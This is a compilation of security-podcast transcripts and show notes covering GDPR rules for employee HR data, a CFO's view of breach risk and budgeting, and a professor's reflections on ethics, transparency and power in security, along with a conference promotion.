SJ: I think that's required when we're doing requirements for sensitive data, and we're talking about sensitive HR data. A DPIA has be performed when two of the following exist, and there's like nine things that have to be there in order for a DPIA to have to be done. But you bring up a great point because the information that an employer is going to have is going to necessarily trigger the DPIA. [See these Working Party 29 guidelines for the nine criteria that Sara refers to.]
The DPIA isn't triggered by us doing the legitimate basis ...
and having to document that process. It's actually triggered because we process sensitive data. You know, their trade union organization, affiliation, their religious data, their ethnicity. We have sensitive information, which is one of the nine things that can trigger, and all you need is two to require a DPIA.
Another one that employers always get is they process data of a vulnerable data subject. A vulnerable data subject includes employees.
IOS: Okay. Right.
SJ: I can't imagine a situation where an employer wouldn’t have to do a DPIA. The DPIA is different than the legitimate interest outweighing [employee rights] documentation that has to be done. They're two different things.
IOS: So, they will have to do the DPIAs? And what would that involve?
SJ: Well, it's one thing that's required for high-risk data processing and that, as we just discussed, includes the data that employer has.
Essentially what a DPIA is, it's a process that is designed to describe what processing the employer has, assess the necessity on proportionality to help manage the risk to the rights and the freedoms of the national persons resulting from the processing of personal data by assessing and determining the measures to address the data and the protections around it.
It's a living document, so one thing to keep in mind about DPIA is they're never done. They are going to be your corporation's living document of the high-risk data you have and what's happening with it to help you create tools for accountability and to comply with the GDPR requirements including, you know, notice to data subject, their rights, and then enforcing those rights.
It's basically a tracking document ... of the data, where the data's going, where the data lives, and what happens with the data and then what happens when somebody asks for their data, wants to erase their data, etc.
SJ: I think one of the most interesting points, whenever I was doing my research, to really drill down, from my knowledge level, is you're allowed to process data so long as it's compliant with a law. You know, there's a legal necessity to do it.
And a lot of employers, U.S employers specifically, look at this and thought, "Great, that legal requirement takes the load off of me because I need, you know, payroll records to comply with the Fair Labor Standards Act and, you know, state wage laws. I need my immigration information to comply with the immigration control format."
You know, they were like, "We have all these U.S. laws of why we have to retain .information and why we have to collect it." Those laws don't count, and I think that's a big shock when I say, well, those laws don't count.
We can't rely on U.S. laws to process EU data!
We can only rely on EU laws and that's one thing that's brought up and kind of coincides with Article 88, which I think is an interesting thing.
If you look at Article 88 when they're talking about employee data, what Article 88 does is it actually allows member states to provide for more specific rules to ensure that the protections and the freedoms of their data are protected.
These member states may be adding on more laws and more rights than the GDPR already complies! Another thing is, not only do we have to comply with an EU law, but we also are going to comply with member states, other specific laws that may be more narrow than the GDPR.
Employers can't just look at the GDPR, they're going to also have to look at if they know where a specific person is. Whether it's Germany or Poland. They're going to have to look and see what aspects of the GDPR are there and then what additional, more specific laws that member state may have also put into effect.
Interviewer: Right!
SJ: So, I think that there are two big legal issues hanging out there that U.S. multinational companies...
IOS: One thing that comes to my mind is that there are fines involved when not complying to this. And that includes, of course, doing these DPIAs.
SJ: The fines are significant. I think that's the easiest way to put it is that the fines are, they're astronomical, I mean, they're not fines that we're used to seeing so there's two levels of fines depending on the violation. And they can be up to a company's 4% of their annual global turnover. Or 20 million Euros. If you'd look at it in U.S. dollar terms, you're looking at, like, $23 million at this point.
For some companies that could be, that's a game changer, that's a company shut down. Some companies can withstand that, but some can't. And I think any time you're facing a $23 million penalty, the cost of compliance is probably going to weigh out the potential penalty.
Especially because these aren't necessarily one-time penalties and there's nothing that's going to stop the Data Protection Authority from coming back on you and reviewing again and assessing another penalty if you aren't in compliance and you've already been fined once.
I think the issue is going to be how far the reach is going to be for U.S. companies. I think for U.S. companies that have, you know, brick and mortar operations in a specific member state, I think enforcement is going to be a lot easier for the DPA.
There's going be a greater disadvantage to, actually, enforcement for, you know, U.S. companies that only operate in U.S. soil.
Now, if they have employees that are located in the EU, I think that enforcement is going to be a little bit easier, but if they don't and they're merely just, you know, attracting business via their website or whatever to EU, I think enforcement is gonna be a little bit more difficult, so it's going to be interesting to see how enforcement actually plays out.
IOS: Yeah, I think you're referring to the territorial scope aspects of the GDPR. Which, yeah, I agree that's kind of interesting.
SJ: I guess my parting advice is this isn't something that's easy, it's something that you do need to speak to an attorney. If you think that it may cover you at all, it's at least worth a conversation. And I've had a lot of those conversations that have lasted, you know, a half an hour, and we've been very easily able to determine that GDPR is not going to cover the U.S. entity.
And we don't have to worry about it. And some we've been able to identify that the GDPR is going to touch very slightly and we're taking eight steps, you know, with the website and, you know, with, you know, on site hard copy documents to make sure that proper consent and notice is given in those documents.
So, sometimes it's not going be the earth-shattering compliance overhaul of a corporation that you think the GDPR may entail, but it's worth a call with a GDPR attorney to at least find out so that you can at least sleep better at night because this is a significant regulation, it's a significant piece of law, and it is going to touch a lot of U.S. operations.
IOS: Right. Well, I want to thank you for talking about this somewhat under-looked area of the GDPR.
SJ: Thank you for having me.
In part two of my interview with Varonis CFO & COO Guy Melamed, we get into the specifics with data breaches, breach notification and the stock price.
What’s clear from our conversation is that you can no longer ignore the risks of a potential breach. There are many ways you can reduce risk. However, if you choose not to take action, minimally, at least have a conversation about it.
Also, around 5:11, I asked a question about IT pros who might need some help getting budget. There’s a story that might help.
So we've seen companies that have gone out of business because of breaches. We've seen companies that will have to deal with litigation for years ahead. So where's that factored in? There's just so many components. It's more of a philosophy that if you can do something active to try and minimize risk, then why not do it?
I think companies, more from a philosophical perspective, should try and actively take action in order to minimize risk. And companies that are under the belief that it won't affect them and that they're going to be okay, I think are acting slightly irresponsible.
So a company would obviously rather try and identify breaches as soon as possible, so they can take action, minimize some of the cost and be transparent with both the customers, the investors, and the shareholders.
GDPR definitely changes the reporting requirement, and if you're breached, you have to provide that information within 72 hours. That's a short period of time, and in order to be able to comply with that regulation, and in order to have better tracking, you really have to have systems, programs, personnel in place to try to identify this.
And the fines that come from GDPR, I'm talking about, you know, some of the requirements and some of the fines related to those requirements, are 4% of global revenue or $25 million, whichever is greater. That's a huge number that could affect companies in so many ways, definitely something that from our perspective what we see is causing a lot of interest, causing a lot of discussion, and companies are not ignoring the regulation because of its significance.
There're so many other components that thinking that you can be okay, and just by paying the fine and being breached is definitely not the action that I would like to take as the company's CFO and definitely would try and act in a way that would minimize the risk long term and short term.
And during a discussion, he was asked, "What is the best way to get budget, in order to get the Varonis product or any other product for that matter that can protect the company in the long term?"
And his response was, "Make sure the risk assessment, the evaluation and whatever you're doing in that demo is done on the finance documents. If the finance personnel, if the CFO can see how many people have access to the financial statements or any other sensitive information within his folders or her folders and have access to information they shouldn't have access to, you'll find the budget, they'll find the budget."
So that's definitely something that I I could relate because if I would see risk on files that I know team members shouldn't have access to, we could move things around within the budget to have something purchased that wasn't necessarily budget initially when I can quantify the risk in my mind.
And people could live with the risk. I don't think people, after all the breaches that have taken place and the amount of risks that companies are dealing with, can ignore it anymore. I think they have to take measures, think about it, or at least have a discussion. If they decide that they want to live with the risk, it should definitely be done after discussion with the legal department, the HR department, CEO, CFO, CISO, if all parties agree that the risk is not worth doing any, taking any action, then at least you had a conversation.
But if it's decided by one person within the organization and it's not shared between the different departments, between the different roles that would eventually be responsible, then I think that's just not good practice.
When I asked our podcast panelists about the difficulty in discerning real businesses from fake or answering innocuous questions about your first pet, it can be time consuming, mentally exhausting and not naturally intuitive.
As technology gets even more difficult to navigate, think about how important it is when presenting time-to-value security solutions to C-Suite executives.
A popular catchphrase amongst IT pros is: “It’s a no brainer.” When an idea presented is expressed as a no brainer, it’s assumed that the idea has obvious value, when processes and strategic decisions are more complicated than it appears.
So when it comes to cybersecurity, not everything is a no brainer. Far from it. If it was simple, Atlanta wouldn’t have spent two million to recover from a ransomware attack and in 2016, the cyberinsurance market wouldn’t’ have brought in 3.5 billion in premiums globally.
Other articles discussed: Monkey loses selfie copyright case
Tool of the week: Algo
Panelists: Cindy Ng, Kilian Englert, Kris Keyser, Mike Buckbee
Sara Jodka is an attorney for Columbus-based Dickinson Wright. Her practice covers boths data privacy as well as employee law. She's in a perfect position to help US companies in understanding how the EU General Data Protection Regulation (GDPR) handles HR data. In this first part of the interview, we learn from Sara that some US companies will be in for a surprise when they learn that all the GPDR security rules will apply to internal employee records. The GPDR's consent requirements, though, are especially tricky for employees.
Sara Jodka: Thank you for having me.
IOS: I wanted to get into an article that you had posted on your law firm's blog. It points out an interesting subcategory of GDPR personal data which doesn't get a lot of attention, and that is employee HR records. You know, of course it's going to include ethnic, payroll, 401(k), and other information.
So can you tell us, at a high level, how the GDPR treats employee data held by companies?
Whenever we're looking at it, none of the articles say that all of these people have these rights. All these individuals have rights! None of them say, "Well, these don't apply in an employment situation." So we don't have any exclusions!
We're led to "Yes, they do apply." And so we've been waiting on, and we have been working with guidances that we're receiving, you know, from the ICO, with respect to …. consent obligation, notice obligation, portability requirements, and any employee context. Because it is going to be a different type of relationship than the consumer relationship!
IOS: It's kind of interesting that people, I think, or businesses, probably are not aware of this ... except those who are in the HR business.
So I think there's an interesting group of US companies that would find themselves under these GDPR rules that probably would not have initially thought they were in this category because they don't collect consumer data. I'm thinking of law firms, investment banking, engineering, professional companies.
They thought, "Well, because we don't actually have a physical location EU, it doesn't actually cover us." That's not actually at all true.
The GDPR covers people that are working in the EU, people who reside in the EU, so to the extent that U.S. company has employees that are working in the EU it is going to cover that type of employee data. And there's no exception in the GDPR around it. So it's going to include those employees.
IOS: So I hadn't even thought about that. So their records would be covered under the GDPR?
SJ: Yeah, the one thing about the definition of a data subject under the GDPR is it doesn't identify that it has to be an EU resident or it has to be an EU citizen. It's just someone in the EU.
When you're there, you have these certain rights that are guaranteed. And that will cover employees that are working for U.S. companies but they're working in the EU.
IOS: Right. And I'm thinking perhaps of a U.S. citizens who come there for some assignment, and maybe working out of the office, they would be covered under these rules.
SJ: And that's definitely a possibility, and that's one thing that we've been looking for. We've been looking for looking for guidance from the ICO to determine … the scope of what this is going to look not only in an employment situation, but we're dealing with an immigration situation, somebody on a work visa, and also in the context of schools as we are having, you know, different students coming over to the United States or going abroad. And what protection then the GDPR applies to those kind of in-transition relationships, those employees or students.
With a lot of my clients, we are trying to err on the side of caution and so do things ahead of time, rather than beg forgiveness if the authorities come knocking at our door.
In that article, you mentioned that the processing of HR records has additional protections under the GDPR … An employee has to give explicit or consent freely and not as part of an employer-employee contract.
[caption id="attachment_10803" align="alignnone" width="800"] GDPR's Article 6 says there are only six lawful ways to process data. If you don't obtain freely given consent, then it gets tricky.[/caption]
Can you explain this? And then, what does an employer have to do to process employee data especially HR data?
SJ: Well, when we're looking at the reasons that we're allowed to process data, we can do it by consent, and we can also do it if we have a lawful basis.
A number of the lawful bases are going to apply in the employer context. One of those is if there is going to be an agreement. You know, in order to comply with the terms of a contract, like a collective bargaining agreement or like an employment agreement. So hire/fire payroll data would be covered under that, also if there is … a vital interest of an employee.
There's speculation that that exception might actually be, or that legitimate basis might be used to obtain vital information regarding, like, emergency contact information of employees.
And there's also one of the other lawful basis is if the employer has a greater, you know, interest in the data that doesn't outweigh the right of the data subject, the employee.
The issue though is most ... when we talk about is consumer data, and we're looking a lot at consent and what actually consent looks like in terms of the express consent, you know, having them, you know, check the box or whatever.
In an employee situation, the [UK’s] ICO has come out with guidance with respect to this. And they have expressly said in an employee-employer relationship, there is an inherent imbalance of bargaining power, meaning an employee can never really consent to giving up their information because they have no bargaining power. They either turn it over, or they're not employed. The employer is left to rely only on the other lawful basis to process data, excluding consent, so the contractor allowance and some of the others.
But the issue I have with that is, I don't think that that's going to cover all the data that we actually collect on an employee, especially employees who are operating outside the scope of a collective bargaining agreement.
In a context of, say, an at-will employee where there is that ... where that contract exception doesn't actually apply. I think there will be a lot of collection of data that doesn't actually fall under that. It may fall into the legitimate interest, if the employer has the forethought to actually do what's required, which is to actually document the process of weighing the employer's interest against the interest of the employee, and making sure that that is a documented process. [ Read the UK's ICO guidelines on the process of working out legitimate interest.]
[caption id="attachment_10804" align="alignnone" width="800"] When employers claim a legitimate interest exception to getting employee consent, they have more work to do. [Source: UK ICO][/caption]But also what comes with that is the notice requirement, and the notice requirement is something that can be waived. So employers, if they are doing that, are going to have to — and this is basically going to cover every single employer — they're going to have to give their employees notice of the data that they are collecting on them, at a minimum.
IOS: At a minimum. I think to summarize what you're saying is it's just so tricky or difficult to get what they call freely given consent, that most employers will rely on legitimate interest.
SJ: I think that's required when we're doing requirements for sensitive data, and we're talking about sensitive HR data. A DPIA has be performed when two of the following exist, and there's like nine things that have to be there in order for a DPIA to have to be done. But you bring up a great point because the information that an employer is going to have is going to necessarily trigger the DPIA. [See these Working Party 29 guidelines for the nine criteria that Sara refers to.]
The DPIA isn't triggered by us doing the legitimate basis ...
and having to document that process. It's actually triggered because we process sensitive data. You know, their trade union organization, affiliation, their religious data, their ethnicity. We have sensitive information, which is one of the nine things that can trigger, and all you need is two to require a DPIA.
Another one that employers always get is they process data of a vulnerable data subject. A vulnerable data subject includes employees.
IOS: Okay. Right.
SJ: I can't imagine a situation where an employer wouldn’t have to do a DPIA. The DPIA is different than the legitimate interest outweighing [employee rights] documentation that has to be done. They're two different things.
IOS: So, they will have to do the DPIAs? And what would that involve?
SJ: Well, it's one thing that's required for high-risk data processing and that, as we just discussed, includes the data that employer has.
Essentially what a DPIA is, it's a process that is designed to describe what processing the employer has, assess the necessity on proportionality to help manage the risk to the rights and the freedoms of the national persons resulting from the processing of personal data by assessing and determining the measures to address the data and the protections around it.
It's a living document, so one thing to keep in mind about DPIA is they're never done. They are going to be your corporation's living document of the high-risk data you have and what's happening with it to help you create tools for accountability and to comply with the GDPR requirements including, you know, notice to data subject, their rights, and then enforcing those rights.
It's basically a tracking document ... of the data, where the data's going, where the data lives, and what happens with the data and then what happens when somebody asks for their data, wants to erase their data, etc.
SJ: I think one of the most interesting points, whenever I was doing my research, to really drill down, from my knowledge level, is you're allowed to process data so long as it's compliant with a law. You know, there's a legal necessity to do it.
And a lot of employers, U.S employers specifically, look at this and thought, "Great, that legal requirement takes the load off of me because I need, you know, payroll records to comply with the Fair Labor Standards Act and, you know, state wage laws. I need my immigration information to comply with the immigration control format."
You know, they were like, "We have all these U.S. laws of why we have to retain .information and why we have to collect it." Those laws don't count, and I think that's a big shock when I say, well, those laws don't count.
We can't rely on U.S. laws to process EU data!
We can only rely on EU laws and that's one thing that's brought up and kind of coincides with Article 88, which I think is an interesting thing.
If you look at Article 88 when they're talking about employee data, what Article 88 does is it actually allows member states to provide for more specific rules to ensure that the protections and the freedoms of their data are protected.
These member states may be adding on more laws and more rights than the GDPR already complies! Another thing is, not only do we have to comply with an EU law, but we also are going to comply with member states, other specific laws that may be more narrow than the GDPR.
Employers can't just look at the GDPR, they're going to also have to look at if they know where a specific person is. Whether it's Germany or Poland. They're going to have to look and see what aspects of the GDPR are there and then what additional, more specific laws that member state may have also put into effect.
Interviewer: Right!
SJ: So, I think that there are two big legal issues hanging out there that U.S. multinational companies...
IOS: One thing that comes to my mind is that there are fines involved when not complying to this. And that includes, of course, doing these DPIAs.
SJ: The fines are significant. I think that's the easiest way to put it is that the fines are, they're astronomical, I mean, they're not fines that we're used to seeing so there's two levels of fines depending on the violation. And they can be up to a company's 4% of their annual global turnover. Or 20 million Euros. If you'd look at it in U.S. dollar terms, you're looking at, like, $23 million at this point.
For some companies that could be, that's a game changer, that's a company shut down. Some companies can withstand that, but some can't. And I think any time you're facing a $23 million penalty, the cost of compliance is probably going to weigh out the potential penalty.
Especially because these aren't necessarily one-time penalties and there's nothing that's going to stop the Data Protection Authority from coming back on you and reviewing again and assessing another penalty if you aren't in compliance and you've already been fined once.
I think the issue is going to be how far the reach is going to be for U.S. companies. I think for U.S. companies that have, you know, brick and mortar operations in a specific member state, I think enforcement is going to be a lot easier for the DPA.
There's going be a greater disadvantage to, actually, enforcement for, you know, U.S. companies that only operate in U.S. soil.
Now, if they have employees that are located in the EU, I think that enforcement is going to be a little bit easier, but if they don't and they're merely just, you know, attracting business via their website or whatever to EU, I think enforcement is gonna be a little bit more difficult, so it's going to be interesting to see how enforcement actually plays out.
IOS: Yeah, I think you're referring to the territorial scope aspects of the GDPR. Which, yeah, I agree that's kind of interesting.
SJ: I guess my parting advice is this isn't something that's easy, it's something that you do need to speak to an attorney. If you think that it may cover you at all, it's at least worth a conversation. And I've had a lot of those conversations that have lasted, you know, a half an hour, and we've been very easily able to determine that GDPR is not going to cover the U.S. entity.
And we don't have to worry about it. And some we've been able to identify that the GDPR is going to touch very slightly and we're taking eight steps, you know, with the website and, you know, with, you know, on site hard copy documents to make sure that proper consent and notice is given in those documents.
So, sometimes it's not going be the earth-shattering compliance overhaul of a corporation that you think the GDPR may entail, but it's worth a call with a GDPR attorney to at least find out so that you can at least sleep better at night because this is a significant regulation, it's a significant piece of law, and it is going to touch a lot of U.S. operations.
IOS: Right. Well, I want to thank you for talking about this somewhat under-looked area of the GDPR.
SJ: Thank you for having me.
Recently, the SEC issued guidance on cybersecurity disclosures, requesting public companies to report data security risk and incidents that have a “material impact” for which reasonable investors would want to know about.
How does the latest guidance impact a CFO’s responsibility in preventing data breaches? Luckily, I was able to speak with Varonis’ CFO and COO Guy Melamed on his perspective.
In part one of my interview with Guy, we discuss the role a CFO has in preventing insider threats and cyberattacks and why companies might not take action until they see how vulnerable they are with their own data.
An interview well worth your time, by the end of the podcast, you’ll have a better understanding of what IT pros, finance, legal and HR have on their minds.
Right now, data breaches are one of the biggest threats that all companies face, and companies are realizing this and increasingly, they're delegating responsibilities to the CFO. According to a survey by the American Institute of CPAs, 72% of companies, they've asked the finance department to take on more of a responsibility to deal with data breaches and attacks. Why should the CFO be involved in protecting the organization's most sensitive data?
So, that kind of created the guidance that was provided to all of the big four accounting firms, and private, and especially public companies have to address that. That release talks about what is company doing from a risk management perspective, how are they protecting against cybersecurity? It talks about the board's role in overseeing the management and any immaterial cybersecurity risk. And it has a lot of discussion as to what type of disclosure needs to be provided in what event. So, when we received that publication in preparation for our 10-K filing, we had to have a discussion, where to put it, what is the risk, how are we addressing it, and a conversation like that takes place with the legal department. It takes place even with the HR department, with some of the regulation and protecting data. So, there's a lot of components that relate to the CFO's role in order to making sure that we address it properly.
So, I think that's step number one. There's additional risks that take place on a day to day, and if I've given you an example from the finance department, if an employee is on warning, goes through a PIP, and he has access to sensitive information, you wanna make sure that that information that he has access to stays within the company, and that an employee isn't accessing more and more information in preparation for departure. So, that's a risk that relates to the finance organization, but relates to so many other departments as well. There's IP that, you know, personnel within the R&D department wanna make sure is protected. There's obviously information related to customers and payroll information and HR and legal and the list just goes on and on. So, the desire is first of all just to be able to know what you need to protect and then who's protecting it, who has access to it and being able to see any abnormal behavior that's taking place within an organization.
So, one of the examples that we see during a selling process is that if we sit showing that risk assessment or even having an initial conversation with someone from the IT or a CISO, and also with a legal department member or a finance member, and we ask one simple question, "If today, 10,000 files would have been deleted, would you know about it?" The answer from the CISO or from the IT personnel is, "Absolutely not. We don't have any ability to know if someone deleted 10,000 files."
But if you ask a finance person or someone from the legal department or an HR personnel, I think the misconception or their automatic reaction would be that there has to be a way and that it seems unreasonable that a company isn't tracking if 10,000 files got deleted today. That, I believe is one of the gaps that has to be breached and the education from the finance side is making sure that you know what the company's tracking and what we're not tracking and if an employee is about to leave, do we have any type of monitoring to make sure that sensitive files aren't taken and provided to a competitor or are even used in the future by that, what would be an ex-employee later on.
So, there's a lot of components on the daily operations. There's a lot of risks that company has to think about and always kind of go through the process of what can go wrong. Maybe it hasn't happened and maybe everything is good now and we trust all of our employees, but what if? And I think the notion that when you have organizations with 1,000 employees or 20,000 employees or 50,000 employees, the notion that all of the employees are ethical is a bit scary and you have to think how to protect the company in the best way.
Meanwhile, finance, legal, and HR, they think, "Oh, hasn't that problem been already solved? It's a little unreasonable," as you've said, "if we weren't able to figure that out."
So, let's talk about the cost of a breach. So, it's been said that the average cost of a data breach is about four million, and there are many organizations that have paid tens of millions of dollars. What are some direct costs and indirect costs to businesses associated with data breaches?
What I would think about is would a CFO, or a COO for that matter, be comfortable with providing their financial statements to a competitor two weeks before they were published? Obviously the answer is, no, and there could be detrimental consequences to that type of breach.
But the breach isn't just on the financial information. There is customer information, there is payroll information. There's just so much sensitive file that sits there that people within the organization have access, and it doesn't necessarily mean that they would break bad. It could be a situation where someone from the outside took control of the credentials of an employee within the organization and starts using that access in the wrong way. So, the notion, and I think what we've seen as a company, as one of the most interesting phenomenas, is that some of the breaches that took place in 2014 really generated a knee jerk reaction and there was a significant IT spent during the beginning of 2015. But that spent at the beginning of the year was mostly towards perimeter defense security. The notion was that if you're protecting the border, you'll be okay. And I think what's been proven day in, day out is that perimeter defense security is absolutely important but the notion that that's the only type of defense that you need has been thrown out the window.
And if you use the same analogy of border patrol or protecting a country, the fact that you have protection on the border doesn't mean that you don't have any other measures and any other organizations that protect you from the inside. Because at one point there is gonna be someone that will be able to overcome that border. Not only that, how are you protecting your organization or your country from people from the inside? So, what we've seen in the last couple years is that the amount of breaches that have taken place have increased significantly. The magnitude has increased significantly, the implications on those companies has increased significantly.
And I know there was an article a couple years ago that discussed the cost of a breach and how you shouldn't buy any software and you can just deal with a breach. That notion has been thrown out the window and, you know, it's obviously that the consequences of a breach that we see it on the news and on the front page of "The Wall Street Journal" and "The Financial Times." It's happening in rates that we haven't seen before and I don't see that going away.
In part two of my interview with Delft University of Technology’s assistant professor of cyber risk, Dr. Wolter Pieters, we continue our discussion on transparency versus secrecy in security.
We also cover ways organizations can present themselves as trustworthy. How? Be very clear about managing expectations. Declare your principles so that end users can trust that you’ll be executing by the principles you advocate. Lastly, have a plan for know what to do when something goes wrong.
And of course there’s a caveat, Wolter reminds us that there’s also a very important place in this world for ethical hackers. Why? Not all security issues can be solved during the design stage.
Privacy, but then again, I think privacy is a bit overrated. This is really about power balance. It's because everything we do in security will give some people access and exclude other people, and that's a very fundamental thing. It's basically about power balance that is through security we embed into technology. And that is what fundamentally interests me in relation to security and ethics.
So, algorithms that were secrets, trade secrets, etc. being broken very moments the algorithm became known. So, in that sense there I think most researchers would agree this is good practice. On the other hand it's seems that there's also a certain limit to what we want to be transparent there. Both in terms of security controls, we're not giving away every single thing governments do in terms of security online. So, there is some level of security by obscurity there and more generally to what extent is transparency a good thing. This again ties in with who is a threat. I mean, we have the whole WikiLeaks endeavor and some people will say, "Well, this is great. The government shouldn't be keeping all that stuff secret." So, it's great for trust that this is now all out in the open. On the other hand, you could argue all this and this is actually a threat to trust in the government. So, this form of transparency would be very bad for trust.
So, there's clearly a tension there. Some level of transparency may help people trust in the protections embedded in the technology and in the actors that use those technologies online. But on the other hand, if there's too much transparency all the nitty-gritty details may actually decrease trust. You see this all over the place. We've seen it through with the electronic voting as well. If you provide some level of explanation on how certain technologies are being secured, that may help. If you provide too much detail people won't understand it and it will only increase distrust. There is a kind of golden middle there in terms of how much explanation you should give to make people trust in certain forms of security encryption, etc. And again, in the end people will have to rely on experts because physical forms of security, physical ballot boxes, it's possible to explain and how these work and how they are being secured with digital that becomes much more complicated and for most people, they will have to trust the judgment of experts that these forms of security are actually good if the experts believe so.
Not only that it's possible to change your privacy settings, to regulate the access that other use of the social networking servers have to your data, but at the same time you need to be crystal clear about how you as a social network operator are using the kind of data. Because sometimes I get the big internet companies are offering all kinds of privacy settings which give people the impression that they can do a lot in terms of their privacy but, yes, this is true for the inter user data access but the provider still sees everything. This seems to be a way of framing privacy in terms of inter user data access. Whereas, I think it's much more fundamental what these companies can do with all the data they gather for all their use and what that means in terms of their power and the position that they get in this whole area of cyberspace this whole arena.
So, managing expectations, I mean, there's all kinds of different standpoints also based on different ethical theories, based on different political points of view that you could take in this space. If you want to behave ethically then make sure you list your principles, you list what you do in terms of security and privacy to adhere to those principles and make sure that people can actually trust that this is also what you do in practice. And also make sure that you know exactly what you're going to do in case something goes wrong anyway. We've seen too many breaches where the responses by the companies were not quite up to standards in terms of delaying the announcement of the breach or it's crucial to not only do some prevention in terms of security and privacy but also know what you're going to do in case something goes wrong.
The same for elections, there is no neutral space from which people can cast their vote without being influenced and we've seen in recent elections that actually technology is playing more and more of a role in how people perceive political parties and how to make decisions in terms of voting. So, it's inevitable that technology companies have a role in those elections and that's also what they need to acknowledge.
And then of course, and I think this is a big question that needs to be asked, "Can we prevent the situation in which the power of certain online stakeholders whether those are companies or are there for a nation state or whatever. Can we prevent a situation in which they get so much power that they are able to influence our governments, either through elections or through other means?" That's a situation that we really don't want to be in and I'm not pretending that I have a crystal clear answers there but this is something that at least we should consider as a possible scenario.
And then there's all these doomsday scenarios with Cyber Pearl Harbor and I'm not sure whether these doomsday scenarios are the best way to think about this but we should also not be naive and think that all of this will blow over because maybe indeed we have already been giving away too much power in a sense. So, what we should do is fundamentally rethink the way we think about security and privacy from, "Oh, damn, my photos are I don't know whatever, in the hands of whoever." That's not the point. It's about the scale in which the certain actors either get their hands on data or lots of individuals are able to influence lots of individuals. So, again scale comes in there. It's not about our individual privacy, it's about the power that these stakeholders get by having access to the data over by being able to influence lots and lots of people and that's what the debate needs to be about.
Wolter Pieters: Yeah. I think that's an issue but if that's going to be happening, if people are afraid to play this role because legislation doesn't protect them enough, then maybe we need to do something about that. If we don't have people that point us to essential weaknesses in security, then what will happen is that those issues will be kept secret and that they will be misused in ways that we don't know about and I think that's much worse situation to be in.
This week, we talk about our annual data risk assessment report and sensitive files open to every employee! 41% of companies are vulnerable. The latest finding put organizations at risk as unsecure folders give attackers easy access to business roadmaps, intellectual property, financial and health data, and more. We even discussed how data open to everyone in an organization relates to user-generated data shared with 3rd party apps. Is it a data security or privacy problem? At the very least, panelists think it’s a breach of confidence.
Other articles discussed:
Panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Kris Keyser
We’re all counting down to the RSA Conference in San Francisco April 16 – 20, where you can connect with the best technology, trends and people that will protect our digital world.
Attendees will receive a Varonis branded baseball hat and will be entered into a $50 gift card raffle drawing for listening to our presentation in our North Hall booth (#3210).
Attendees that visit us in the South Hall (#417) will receive a car vent cell phone holder.
In addition to stopping by our booth, below are sessions you should consider attending. You’ll gain important insights into best security practices and data breach prevention tips, while learning how to navigate a constantly evolving business climate.
Sessions Discussed:
In part one of my interview with Delft University of Technology’s assistant professor of cyber risk, Dr. Wolter Pieters, we learn about the fundamentals of ethics as it relates to new technology, starting with the trolley problem. A thought experiment on ethics, it’s an important lesson in the world of self-driving cars and the course of action the computer on wheels would have to take when faced with potential life threatening consequences.
Wolter also takes us through a thought track on the potential of power imbalances when some stakeholders have a lot more access to information than others. That led us to think, is technology morally neutral? Where and when does one’s duty to prevent misuse begin and end?
Privacy, but then again, I think privacy is a bit overrated. This is really about power balance. It's because everything we do in security will give some people access and exclude other people, and that's a very fundamental thing. It's basically about power balance that is through security we embed into technology. And that is what fundamentally interests me in relation to security and ethics.
Cindy Ng: Let's go back first and start with philosophical, ethical, and moral terminology. The trolley problem: it's where you're presented two dilemmas, where you're the conductor and you see the trolley is going down a track and it has the potential to kill five people. But then if you pull a lever, you can make the trolley go on the other track where it would kill one person. And that really is about: what is the most ethical choice and what does ethics mean?
Wolter Pieters: Right. So, ethics generally deals with protecting values. And values, basically, refer to things that we believe are worthy of protection. So, those can be anything from health, privacy, biodiversity. And then it's said that some values can be fundamental, others can be instrumental in the sense that they only help to support other values, but they're not intrinsically worth something in and of themselves.
Ethics aims to come up with rules, guidelines, principles that help us support those values in what we do. You can do this in different ways. You can try to look only at the consequences of your actions. And in this case, clearly, in relation to the trolley problem, it's better to kill one person than to kill five. If you simply do the calculation, you know, you could say, "Well, I pull the switch and thereby reduce the total consequences." But you could also argue that certain rules state like you shall not kill someone, which would be violated in case you pull the switch. I mean, if you don't do something, then five people would be killed. Then you don't do something explicitly, whereas you would pull the switch you would explicitly kill someone. And from that angle, you could argue that you should not pull the switch.
So, this is very briefly an outline of different ways in which you could reason about what actions would be appropriate in order to support certain values, in this case, life and death. Now, this trolley problem is these days often cited in relation to self-driving cars, which also would have to make decisions about courses of action, trying to minimize certain consequences, etc. So, that's why this has become very prominent in the ethics space.
Cindy Ng: So, you've talked about a power in balance. Can you elaborate on and provide an example on what that means?
Wolter Pieters: What we see in cyberspace is that there are all kinds of actors, stakeholders that gather lots of information. There's governments being interested in doing types of surveillance in order to catch the terrorist amongst the innocent data traffic. There is content providers that give us all kinds of nice services, but at the same time, we pay with our data, and they make profiles out of it and offers targeted advertisements and, etc. And at some point, some companies may be able to do better predictions than even our governments can do. So, what does that mean? In the Netherlands, today actually, there's a referendum regarding new powers for the intelligence agencies to do types of surveillance online, so there's a lot of discussion about that.
So, on the one hand, we all agree that we should try to prevent terrorism, etc. On the other hand, this is also a relatively easy argument to claim access to data, they're like, "Hey, we can't allow these terrorists attacks, so we need all your data." It's very political. And this also makes it possible to kind of leverage security as an argument to claim access to all kinds of things.
Cindy Ng: I've been drawn to ethics and the dilemma of our technology, and because I work at a data security company, you learn about privacy regulations, GDPR, HIPAA, SOX compliance. And at the core, they are about ethics and a moral standard of behavior. And can you address the tension between ethics and technology?
And the best thing I read lately was Bloomberg's subhead that said that ethics don't scale. When ethics is such a core value, but at the same time, technology is sort of what drives economies, and then add an element of a government to overseeing it all.
Wolter Pieters: There's a couple of issues here. One is that's often cited is that ethics and law seem to be lagging behind compared to our technological achievements. We always have to wait for new technology to kind of get out of hand before we start thinking about ethics and regulation. So, in a way, you could argue that's the case for internet of things type developments where manufacturers of products have been making their products smart for quite a while now. And we suddenly realized that all of these things have security vulnerabilities, and they and they can become part of botnets of cameras that can then be used to do distributed denial of attacks on our websites, etc. And only now are we starting to think about what is needed to make sure that these and other things, devices are securable at some level. Can they be updated? Can they be patched? In a way, it already seems to be too late. So, it is the argument then that is lagging behind.
On the other hand, there's also the point that ethics and norms are always in a way embedded in technologies. And again, in the security space, whatever way you design technology, it will always enable certain kinds of access, and it will disable other kinds of access. So, there's always this inclusion, exclusion going on with new digital technologies. So, in that sense, increasingly, ethics is always already present in a technology. And I'm not sure whether ethics, whether it should be said that ethics doesn't scale. Maybe the problem is rather that it scales too well in the sense that, when we design a piece of technology, we can't really imagine how things are going to work out if the technology is being used by millions of people. So, this holds for a lot of these elements.
